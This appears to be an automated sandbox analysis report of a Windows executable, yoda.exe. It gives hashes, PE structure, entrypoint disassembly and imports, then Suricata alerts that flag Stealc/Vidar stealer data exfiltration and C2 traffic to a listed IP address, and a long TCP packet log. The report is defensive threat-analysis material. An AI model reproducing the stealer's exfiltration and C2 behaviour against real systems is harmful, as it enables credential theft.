                                                                                                                                                                                                                                                              Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Entropy (8bit):7.972615296085439
                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                              File name:yoda.exe
                                                                                                                                                                                                                                                              File size:853'528 bytes
                                                                                                                                                                                                                                                              MD5:79884836c406ae143bc31aeadfa81e70
                                                                                                                                                                                                                                                              SHA1:3a38f9b4cf9fc75a0b6ec34230e431e0c4b7c1a2
                                                                                                                                                                                                                                                              SHA256:47d48f2753f7eab065480d9b125c1429a7943ed1fbb408e3076d7a3e3102bd0c
                                                                                                                                                                                                                                                              SHA512:1a566b38e8668fc932ada37462d099b7494fdbedb38b113a2644b67652d85ba3ba784892f5989017e2889562a1e535db9bfd43e63f27db6d4871bd014eb0b66a
                                                                                                                                                                                                                                                              SSDEEP:12288:y0gQY86Y8R5WhfO/3DeOWyE5CStQNN+GUOWVL5mwE/oN615/62K2:9lY86Y0Whm/Sby/iLGprwUO2K2
                                                                                                                                                                                                                                                              TLSH:8505238FDE78A033F4924FB0A6B2E7E75DB3F6147E58A21E95104DCD3D813605A28B16
                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                                              Icon Hash:5a12daaaaabac0e1

                                                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Entrypoint:0x4038af
                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                              Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                              Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                                                                                                                              Authenticode Signature

                                                                                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                                                                                              Signature Issuer:CN=VeriSign Class 3 Code Signing 2009-2 CA, OU=Terms of use at https://www.verisign.com/rpa (c)09, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                              Error Number:-2146869232
                                                                                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                                                                                              • 01/07/2010 20:00:00 02/07/2011 19:59:59
                                                                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                                                                              • CN=USBlyzer, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=USBlyzer, L=St. Petersburg, S=St. Petersburg, C=RU
                                                                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                                                                              Thumbprint MD5:75297C190C025C7A82B15677D333560E
                                                                                                                                                                                                                                                              Thumbprint SHA-1:86E18A81B94E1011C5D3E1E60789AAACCF36704A
                                                                                                                                                                                                                                                              Thumbprint SHA-256:1E9B8DE53D2F7273D2C9CBBF7AA2382E1A6C2141774B5C41FFE26E60A0F07CC9
                                                                                                                                                                                                                                                              Serial:62FCC26A7F4A434259B8883B05A42C28

                                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                              sub esp, 000002D4h
                                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                              push 00000020h
                                                                                                                                                                                                                                                              xor ebp, ebp
                                                                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                                                                              mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                              mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                              mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                              call dword ptr [00409030h]
                                                                                                                                                                                                                                                              push 00008001h
                                                                                                                                                                                                                                                              call dword ptr [004090B4h]
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              call dword ptr [004092C0h]
                                                                                                                                                                                                                                                              push 00000008h
                                                                                                                                                                                                                                                              mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                              call 00007F5F88BBF3FBh
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              push 000002B4h
                                                                                                                                                                                                                                                              mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                              lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              push 0040A264h
                                                                                                                                                                                                                                                              call dword ptr [00409184h]
                                                                                                                                                                                                                                                              push 0040A24Ch
                                                                                                                                                                                                                                                              push 00476AA0h
                                                                                                                                                                                                                                                              call 00007F5F88BBF0DDh
                                                                                                                                                                                                                                                              call dword ptr [004090B0h]
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              mov edi, 004CF0A0h
                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                              call 00007F5F88BBF0CBh
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              call dword ptr [00409134h]
                                                                                                                                                                                                                                                              cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                              mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                              mov eax, edi
                                                                                                                                                                                                                                                              jne 00007F5F88BBC9CAh
                                                                                                                                                                                                                                                              push 00000022h
                                                                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                                                                              mov eax, 004CF0A2h
                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              call 00007F5F88BBEDA1h
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              call dword ptr [00409260h]
                                                                                                                                                                                                                                                              mov esi, eax
                                                                                                                                                                                                                                                              mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                              jmp 00007F5F88BBCA53h
                                                                                                                                                                                                                                                              push 00000020h
                                                                                                                                                                                                                                                              pop ebx
                                                                                                                                                                                                                                                              cmp ax, bx
                                                                                                                                                                                                                                                              jne 00007F5F88BBC9CAh
                                                                                                                                                                                                                                                              add esi, 02h
                                                                                                                                                                                                                                                              cmp word ptr [esi], bx

                                                                                                                                                                                                                                                              Rich Headers

                                                                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                              • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                              • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                              • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x3b86.rsrc
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xcebd00x1a48.ndata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                              .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .rsrc0x1000000x3b860x3c009744b1b7543feb2665749a9110517ce8False0.8283203125data7.168312895309525IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .reloc0x1040000xfd60x1000618a04743fe4c36423f2a38b2971e4e3False0.5986328125data5.600854272197166IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                              RT_ICON0x1001c00x2327PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001222358039782
                                                                                                                                                                                                                                                              RT_ICON0x1024e80x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.5892531876138434
                                                                                                                                                                                                                                                              RT_DIALOG0x1036100x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                              RT_DIALOG0x1037100x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                              RT_DIALOG0x10382c0x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                              RT_GROUP_ICON0x10388c0x22dataEnglishUnited States0.9411764705882353
                                                                                                                                                                                                                                                              RT_MANIFEST0x1038b00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                                              KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                              USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                              SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                              ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                              VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                              2024-12-27T07:09:32.959230+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.449740188.245.216.205443TCP
                                                                                                                                                                                                                                                              2024-12-27T07:09:35.450295+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.449742188.245.216.205443TCP
                                                                                                                                                                                                                                                              2024-12-27T07:09:38.030778+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1188.245.216.205443192.168.2.449743TCP
                                                                                                                                                                                                                                                              2024-12-27T07:09:40.415459+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11188.245.216.205443192.168.2.449744TCP

                                                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:09.350683928 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:25.743997097 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:25.744045019 CET44349735149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:25.744128942 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:25.765357018 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:25.765367985 CET44349735149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:26.166292906 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:26.286035061 CET8049723199.232.210.172192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:26.286094904 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.156075001 CET44349735149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.156147957 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.208113909 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.208147049 CET44349735149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.208657026 CET44349735149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.208704948 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.213768005 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.259335995 CET44349735149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699498892 CET44349735149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699527025 CET44349735149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699553013 CET44349735149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699564934 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699579954 CET44349735149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699601889 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699644089 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699649096 CET44349735149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699672937 CET44349735149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699688911 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.699721098 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.701616049 CET49735443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.701631069 CET44349735149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.844289064 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.844331980 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.844397068 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.844623089 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.844641924 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:29.893074989 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:29.893157005 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:29.905883074 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:29.905905008 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:29.906215906 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:29.906373024 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:29.906706095 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:29.947335005 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.598114014 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.598198891 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.598212004 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.598268032 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.598293066 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.598339081 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.600501060 CET49738443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.600512028 CET44349738188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.602164984 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.602184057 CET44349740188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.602257967 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.602458000 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:30.602473021 CET44349740188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.050731897 CET44349740188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.052165985 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.052750111 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.052774906 CET44349740188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.054882050 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.054898024 CET44349740188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.959244013 CET44349740188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.959326029 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.959336042 CET44349740188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:32.959402084 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:33.012392998 CET49740443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:33.012402058 CET44349740188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:33.025554895 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:33.025566101 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:33.025648117 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:33.025923967 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:33.025938988 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:34.564165115 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:34.564341068 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:34.564851046 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:34.564862013 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:34.574414015 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:34.574426889 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450351954 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450408936 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450442076 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450483084 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450511932 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450541973 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450579882 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450638056 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450794935 CET49742443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.450813055 CET44349742188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.452330112 CET49743443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.452387094 CET44349743188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.452481985 CET49743443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.452701092 CET49743443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:35.452716112 CET44349743188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:37.121176004 CET44349743188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:37.121273994 CET49743443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:37.121743917 CET49743443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:37.121748924 CET44349743188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:37.123986006 CET49743443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:37.123991966 CET44349743188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:38.030550003 CET44349743188.245.216.205192.168.2.4
